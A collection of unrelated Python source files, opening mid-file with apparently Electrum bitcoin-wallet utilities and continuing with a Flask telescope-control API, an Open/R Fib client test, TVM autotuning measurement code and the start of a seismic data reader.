'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer(config):
return config.get('block_explorer', 'Blockchain.info')
def block_explorer_tuple(config):
return block_explorer_info.get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
import bitcoin
from bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urlparse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urlparse.parse_qs(query)
else:
pq = urlparse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message'].decode('utf8')
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).encode('hex')
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
def get_payment_request_thread():
import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
if type(message) == unicode:
message = message.encode('utf8')
query.append('message=%s'%urllib.quote(message))
p = urlparse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urlparse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
def parse_json(message):
n = message.find('\n')
if n==-1:
return None, message
try:
j = json.loads( message[0:n] )
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = ''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error, err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = ''
except:
traceback.print_exc(file=sys.stderr)
data = ''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
self._send(out)
def send_all(self, requests):
out = ''.join(map(lambda x: json.dumps(x) + '\n', requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
elif e[0] in ['timed out', 'The write operation timed out']:
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
import Queue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else Queue.Queue()
self.get_queue = get_queue if get_queue else Queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except Queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except Queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
class StoreDict(dict):
def __init__(self, config, name):
self.config = config
self.path = os.path.join(self.config.path, name)
self.load()
def load(self):
try:
with open(self.path, 'r') as f:
self.update(json.loads(f.read()))
except:
pass
def save(self):
with open(self.path, 'w') as f:
s = json.dumps(self, indent=4, sort_keys=True)
r = f.write(s)
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.save()
def pop(self, key):
if key in self.keys():
dict.pop(self, key)
self.save()
def check_www_dir(rdir):
import urllib, urlparse, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urlparse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.urlretrieve(URL, path)
|
test_server.py | #!/usr/bin/env python
from multiprocessing import Process, Manager
def f(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
if __name__ == '__main__':
manager = Manager()
d = manager.dict()
l = manager.list(range(10))
p = Process(target=f, args=(d, l))
p.start()
p.join()
print(d)
print(l)
|
info_api.py | import queue
import json
import os
import datetime
from threading import Thread
from flask import Response, request
from flask_restplus import Namespace, Resource
from flask.json import jsonify
from hti.server.state.events import subscribe_for_events, log_event
from hti.server.state.globals import (
get_catalog,
get_app_state,
get_frame_manager,
)
from .util import camel_case_keys_recursively, to_dict_recursively
from lib.coordinates import Coordinates
from lib.solver import Solver
api = Namespace('Info', description='Info API endpoints')
@api.route('/events')
class EventsApi(Resource):
@api.doc(
description='Start to get server events',
response={
200: 'Success'
}
)
def get(self):
def gen():
q = queue.Queue()
subscribe_for_events(q)
# Send an event with the current app state
get_app_state().send_event()
while True:
data = q.get()
# convert objects to dicts and make keys camel case
data_dict = to_dict_recursively(data)
camel_case_dict = camel_case_keys_recursively(data_dict)
yield f'data: {json.dumps(camel_case_dict)}\n\n'
return Response(gen(), mimetype="text/event-stream")
@api.route('/target/<query>')
class QueryTargetApi(Resource):
@api.doc(
description='Get coordinates from target description',
response={
200: 'Success',
404: 'Object not found in catalog'
}
)
def get(self, query):
parsed_coordinates = Coordinates.parse(query)
if parsed_coordinates is not None:
target = {
'ra': parsed_coordinates.ra,
'dec': parsed_coordinates.dec
}
get_app_state().target = parsed_coordinates
return jsonify(target)
catalog_result = get_catalog().get_entry(query.upper())
if catalog_result is not None:
parsed_coordinates = Coordinates.parse_csvformat(catalog_result['RA'], catalog_result['Dec'])
target = {
'name': catalog_result['Name'],
'ra': parsed_coordinates.ra,
'dec': parsed_coordinates.dec,
'type': catalog_result.get('Type'),
'const': catalog_result.get('Const'),
'minAx': catalog_result.get('MinAx'),
'majAx': catalog_result.get('MajAx'),
'posAng': catalog_result.get('PosAng'),
}
get_app_state().target = parsed_coordinates
return jsonify(target)
return '', 404
@api.route('/stars')
class QueryStarsApi(Resource):
@api.doc(
description='Get a list of stars based on query criteria',
response={
200: 'Success',
}
)
def get(self):
count = request.args.get('count') if 'count' in request.args else 1000
area = {
'raMin': request.args.get('raMin'),
'raMax': request.args.get('raMax'),
'decMin': request.args.get('decMin'),
'decMax': request.args.get('decMax'),
} if 'raMin' in request.args else None
stars = get_catalog().get_stars(area=area, count=count)
return stars, 200
@api.route('/images/calibrate')
class CalibrateImageApi(Resource):
@api.doc(
description='Get calibration data of given image',
response={
200: 'Success',
404: 'Image not found or failed to calibrate'
}
)
def post(self):
body = request.json
frame_path = body['framePath']
timeout = float(body['timeout'])
frame = get_frame_manager().get_frame_by_path(frame_path)
if frame is None:
return 'Frame not found', 404
here = os.path.dirname(os.path.abspath(__file__))
hti_static_dir = os.path.join(here, '..', '..', 'static')
if not frame.persisted:
frame.persist(hti_static_dir)
filepath = os.path.join(hti_static_dir, frame.path)
app_state = get_app_state()
def analyze_fun():
app_state.calibrating = True
calibration_data = Solver().analyze_image(
filepath,
timeout,
run_callback=lambda: app_state.calibrating,
)
app_state.calibrating = False
timestamp = int(datetime.datetime.now().timestamp())
if calibration_data is None:
log_event('Calibration failed')
else:
rotation_angle = calibration_data.rotation_angle
position = calibration_data.center_deg
log_event(f'Image center: {position} Rotation: {rotation_angle}')
if app_state.target is not None:
target_distance = Coordinates(
app_state.target.ra - position.ra,
app_state.target.dec - position.dec
)
log_event(f'Distance to target: {target_distance}')
app_state.last_known_position = {
'timestamp': timestamp,
'position': position,
}
Thread(target=analyze_fun).start()
return '', 200
@api.route('/images/calibrate/stop')
class CalibrateImageApi(Resource):
@api.doc(
description='Stop running calibration',
response={
200: 'Success',
}
)
def post(self):
get_app_state().calibrating = False
return '', 200
@api.route('/directory')
class ListDirectoryApi(Resource):
def _list_dir_recursively(self, path: str) -> list:
entries = list(os.listdir(path))
entries.sort()
for entry_index, entry in enumerate(entries):
sub_path = os.path.join(path, entry)
if os.path.isdir(sub_path):
entries[entry_index] = {
'name': entry,
'children': self._list_dir_recursively(sub_path)
}
return entries
@api.doc(
description='List subdirectories and files of given directory',
response={
200: 'Success',
400: 'Malformed request',
404: 'Directory not found'
}
)
def post(self):
body = request.json
if body is None:
return 'Missing request body', 400
path = body.get('path') # path is understood to be relative to static
recursive = body.get('recursive', False)
if path is None:
return 'Missing path in request body', 400
here = os.path.dirname(os.path.abspath(__file__))
hti_static_dir = os.path.join(here, '..', '..', 'static')
final_path = os.path.normpath(os.path.join(hti_static_dir, path))
if not os.path.isdir(final_path):
return f'Directory {final_path} not found', 404
if recursive:
entries = self._list_dir_recursively(final_path)
else:
entries = os.listdir(final_path)
entries.sort()
return jsonify(entries)
|
fib_client_tests.py | #!/usr/bin/env python3
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from builtins import range
from builtins import object
from openr.utils import socket
from openr.clients import fib_client
from openr.Fib import ttypes as fib_types
import zmq
import unittest
from multiprocessing import Process
route_db_cache = fib_types.RouteDatabase()
route_db_cache.thisNodeName = 'san jose 1'
class Fib(object):
def __init__(self, zmq_ctx, url):
self._fib_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._fib_server_socket.bind(url)
self._route_db_cache = route_db_cache
def process_request(self):
self._fib_server_socket.recv_thrift_obj(fib_types.FibRequest)
self._fib_server_socket.send_thrift_obj(self._route_db_cache)
class TestFibClient(unittest.TestCase):
def test(self):
num_req = 1
def _fib_server():
fib_server = Fib(zmq.Context(), "tcp://*:5000")
for _ in range(num_req):
fib_server.process_request()
def _fib_client():
fib_client_inst = fib_client.FibClient(
zmq.Context(), "tcp://localhost:5000")
self.assertEqual(fib_client_inst.get_route_db(), route_db_cache)
p = Process(target=_fib_server)
p.start()
q = Process(target=_fib_client)
q.start()
p.join()
q.join()
|
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
from ... import ir_pass, build, build_config, nd, TVMError, register_func, \
rpc as _rpc, target as _target
from ...contrib import nvcc, ndk, tar
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
"""
Stores all the necessary inputs for a measurement.
Parameters
----------
filename : str
The filename of generated library
arg_info : Tuple
The shape and dtype information of tvm tensor arguments
error : Exception
The error happens during compilation.
time_cost : float
The time cost of building
"""
class LocalBuilder(Builder):
"""Run compilation on local machine
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
build_func: callable or str
If is 'default', use default build function
If is 'ndk', use function for android ndk
If is callable, use it as custom build function, expect lib_format field.
"""
def __init__(self, timeout=10, n_parallel=None, build_func='default'):
super(LocalBuilder, self).__init__(timeout, n_parallel)
if isinstance(build_func, str):
if build_func == 'default':
build_func = tar.tar
elif build_func == 'ndk':
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
self.build_func = _wrap_build_func(build_func)
self.executor = LocalExecutor(timeout=timeout)
self.tmp_dir = tempfile.mkdtemp()
def build(self, measure_inputs):
results = []
shutil.rmtree(self.tmp_dir)
self.tmp_dir = tempfile.mkdtemp()
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for inp in measure_inputs[i:i + self.n_parallel]:
ret = self.executor.submit(self.build_func,
inp,
self.tmp_dir,
**self.build_kwargs)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception):
# timeout or fleet error, return MeasureResult directly
results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
self.timeout, time.time()))
elif res.error is not None:
# instantiation error
if isinstance(res.error, InstantiationError):
results.append(MeasureResult((res.error,),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else:
if "InstantiationError" in str(res.error):
msg = str(res.error)
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
results.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else: # tvm error
results.append(MeasureResult((res.error,),
MeasureErrorNo.COMPILE_HOST,
res.time_cost, time.time()))
else:
# return BuildResult
results.append(res)
return results
class RPCRunner(Runner):
"""Run generated code on remove devices.
This function will ask a RPC Tracker to get device for measurement.
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
key: str
The key of the device registered in the tracker
host: str
The host address of RPC Tracker
port: int
The port of RPC Tracker
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first "1" is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
"""
def __init__(self,
key, host, port, priority=1,
timeout=10, n_parallel=None,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(RPCRunner, self).__init__(timeout, n_parallel)
self.key = key
self.host = host
self.port = port
self.priority = priority
self.timeout = timeout
self.number = number
self.repeat = repeat
self.min_repeat_ms = min_repeat_ms
self.ref_input = None
self.ref_output = None
self.check_correctness = check_correctness
self.cooldown_interval = cooldown_interval
self.executor = LocalExecutor()
def set_task(self, task):
self.task = task
if check_remote(task.target, self.key, self.host, self.port):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
if self.check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for you custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in self.ref_input]
func(*tvm_buf)
self.ref_output = [x.asnumpy() for x in tvm_buf]
def get_build_kwargs(self):
kwargs = {}
if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys:
remote = request_remote(self.key, self.host, self.port)
ctx = remote.context(str(self.task.target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in self.task.target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
return kwargs
def run(self, measure_inputs, build_results):
results = []
remote_args = (self.key, self.host, self.port, self.priority, self.timeout)
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
build_results[i:i+self.n_parallel]):
ret = self.executor.submit(run_through_rpc,
measure_inp,
build_res,
self.number,
self.repeat,
self.min_repeat_ms,
self.cooldown_interval,
remote_args,
self.ref_input,
self.ref_output)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception): # executor error or timeout
results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
self.timeout, time.time()))
else:
results.append(res)
return results
class LocalRunner(RPCRunner):
"""Run generated code on local devices.
Parameters
----------
timeout: float
The timeout of a compilation
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
Note
----
This is a "fake" local mode. We start a silent rpc tracker and rpc server
for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
"""
def __init__(self,
timeout=10,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(LocalRunner, self).__init__('', None, None, 0,
timeout=timeout, n_parallel=1,
number=number, repeat=repeat,
min_repeat_ms=min_repeat_ms,
cooldown_interval=cooldown_interval,
check_correctness=check_correctness)
self.tracker = None
self.server = None
def set_task(self, task):
self.task = task
from ...rpc.tracker import Tracker
from ...rpc.server import Server
tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('0.0.0.0', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
self.key = device_key
self.host = tracker.host
self.port = tracker.port
super(LocalRunner, self).set_task(task)
return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
"""Common part for building a configuration"""
target, task, config = measure_input
with target:
s, args = task.instantiate(config)
# check invalidity of template and code hash consistency
if not config.valid():
raise InstantiationError(config.errors)
opts = build_option or {}
if check_gpu: # Add verify pass to filter out invalid configs in advance.
opts["add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
if cuda_arch:
set_cuda_target_arch(cuda_arch)
# if target is vta, we need to use vta build
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
import vta
func = vta.build(s, args, target_host=task.target_host)
else:
with build_config(**opts):
func = build(s, args, target_host=task.target_host)
return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
"""
Wrap build_func to a function that can be used in measure.
Parameters
----------
build_func : The compilation function
We expect fcompile to contain an attr "output_format"
Returns
-------
wrapped_build_func : function
The wrapped build function
"""
if not hasattr(build_func, "output_format"):
raise AttributeError("Expect build_func to have the attribute output_format.")
output_format = build_func.output_format
def _wrapped(measure_input, tmp_dir, **kwargs):
"""
Wrapped build func.
Parameters
----------
measure_input: MeasureInput
The input of measurement
tmp_dir: str
The path of temporary directory to export generated library
"""
tic = time.time()
try:
filename = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
getrandbits(64), output_format))
# TODO(tvm-team) consider linline _build_func_common
func, arg_info = _build_func_common(measure_input, **kwargs)
func.export_library(filename, build_func)
except Exception as e: # pylint: disable=broad-except
return BuildResult(None, None, e, time.time() - tic)
return BuildResult(filename, arg_info, None, time.time() - tic)
return _wrapped
def run_through_rpc(measure_input, build_result,
number, repeat, min_repeat_ms, cooldown_interval,
remote_args, ref_input=None, ref_output=None):
"""Run a generated library through rpc
Parameters
----------
measure_input: MeasureInput
The raw measure input
build_result: BuildResult
The result returned from Builder. This contains the path to the generated library.
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float
The cool down interval between two measurements
remote_args: Tuple
The argument for request_remote
ref_input: List of np.ndarray
The reference input used for checking correctness
ref_output: List of np.ndarray
The reference output used for checking correctness
"""
if isinstance(build_result, MeasureResult):
return build_result
tic = time.time()
errno = MeasureErrorNo.NO_ERROR
try:
# upload built module
remote = request_remote(*remote_args)
# Program the FPGA every single time when targeting VTA
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
from vta import program_fpga, reconfig_runtime
program_fpga(remote, None)
reconfig_runtime(remote)
remote.upload(build_result.filename)
func = remote.load_module(os.path.split(build_result.filename)[1])
ctx = remote.context(str(measure_input.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)
# set input
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
# create empty arrays on the remote device and copy them once.
# This can avoid some memory issues that make the measurement results unreliable.
args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
args = [nd.array(x, ctx=ctx) for x in args]
ctx.sync()
costs = time_f(*args).results
# clean up remote files
remote.remove(build_result.filename)
remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
remote.remove('')
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
costs = tuple(costs[1:-1])
# check correctness of output
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "CUDA Source" in msg:
msg = msg[:msg.index("CUDA Source")]
costs = (RuntimeError(msg[:1024]),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
time.sleep(cooldown_interval)
return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
"""Request a remote session
Parameters
----------
device_key: string
The device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this session (units: second)
Returns
------
session: RPCSession
"""
# connect to the tracker
host = host or os.environ['TVM_TRACKER_HOST']
port = port or int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this check (units: seconds).
Returns
-------
available: bool
True if can find available device
"""
def _check():
remote = request_remote(device_key, host, port, priority)
ctx = remote.context(str(target))
while not ctx.exist: # wait until we get an available device
pass
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
@register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
# e.g., target arch could be [
# "-gencode", "arch=compute_52,code=sm_52",
# "-gencode", "arch=compute_70,code=sm_70"
# ]
target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler
Parameters
----------
arch: str or list
The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
it can also be a count of gencode arguments pass to nvcc command line,
e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
"""
AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(stmt):
valid = ir_pass.VerifyGPUCode(stmt, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return stmt
return verify_pass
|
data_reader.py | import numpy as np
import pandas as pd
import scipy.signal
import tensorflow as tf
pd.options.mode.chained_assignment = None
import logging
import os
import threading
import obspy
from scipy.interpolate import interp1d
tf.compat.v1.disable_eager_execution()
# from tensorflow.python.ops.linalg_ops import norm
# from tensorflow.python.util import nest
class Config:
seed = 100
n_class = 2
fs = 100
dt = 1.0 / fs
freq_range = [0, fs / 2]
time_range = [0, 30]
nperseg = 30
nfft = 60
plot = False
nt = 3000
X_shape = [31, 201, 2]
Y_shape = [31, 201, n_class]
signal_shape = [31, 201]
noise_shape = signal_shape
use_seed = False
queue_size = 10
noise_mean = 2
noise_std = 1
# noise_low = 1
# noise_high = 5
use_buffer = True
snr_threshold = 10
# %%
# def normalize(data, window=3000):
# """
# data: nsta, chn, nt
# """
# shift = window//2
# nt = len(data)
# ## std in slide windows
# data_pad = np.pad(data, ((window//2, window//2)), mode="reflect")
# t = np.arange(0, nt, shift, dtype="int")
# # print(f"nt = {nt}, nt+window//2 = {nt+window//2}")
# std = np.zeros(len(t))
# mean = np.zeros(len(t))
# for i in range(len(std)):
# std[i] = np.std(data_pad[i*shift:i*shift+window])
# mean[i] = np.mean(data_pad[i*shift:i*shift+window])
# t = np.append(t, nt)
# std = np.append(std, [np.std(data_pad[-window:])])
# mean = np.append(mean, [np.mean(data_pad[-window:])])
# # print(t)
# ## normalize data with interplated std
